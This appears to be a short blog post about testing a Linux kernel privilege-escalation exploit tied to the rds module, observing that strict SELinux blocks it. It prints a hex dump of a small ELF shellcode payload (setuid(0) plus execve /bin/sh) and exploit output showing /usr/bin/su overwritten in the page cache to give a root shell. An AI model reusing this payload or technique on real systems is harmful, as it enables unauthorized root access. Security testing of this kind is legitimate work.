    0000: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
    0010: 03 00 3e 00 01 00 00 00 68 00 00 00 00 00 00 00 |..>.....h.......|
    0020: 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |8...............|
    0030: 00 00 00 00 40 00 38 00 01 00 00 00 05 00 00 00 |....@.8.........|
    0040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
    0050: 2f 62 69 6e 2f 73 68 00 81 00 00 00 00 00 00 00 |/bin/sh.........|
    0060: 81 00 00 00 00 00 00 00 31 ff b0 69 0f 05 48 8d |........1..i..H.|
    0070: 3d db ff ff ff 6a 00 57 48 89 e6 31 d2 b0 3b 0f |=....j.WH..1..;.|
    0080: 05 |.|
    [+] verification PASSED - page cache overwritten with SHELL_ELF
    [+] executing /usr/bin/su (now contains setuid(0) + execve /bin/sh)...
    === RESTORE: sudo cp /tmp/.backup_su_13294 /usr/bin/su && sudo chmod u+s /usr/bin/su ===
    #
SE Linux in a “strict” configuration stops this exploit.
The test VM is running Debian/Testing, I haven’t bothered investigating whether it’s a default setting for Debian to not load the rds module or whether it was some change that I made either directly or indirectly. Security via SE Linux is of more interest to me than security via controlling module load.
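For anyone repeating the test, whether the rds module is loaded can be checked from /proc/modules before and after running the exploit. This is a minimal sketch. The function name `module_loaded` is made up, and the optional second argument is only there so it can be tried against a saved copy of the file.

```shell
# Succeed if the named kernel module appears in the module list.
# Reads /proc/modules unless another file is given.
module_loaded() {
    awk -v m="$1" '$1 == m { found = 1 } END { exit !found }' \
        "${2:-/proc/modules}"
}

# Example:
#   if module_loaded rds; then echo "rds is loaded"; fi
```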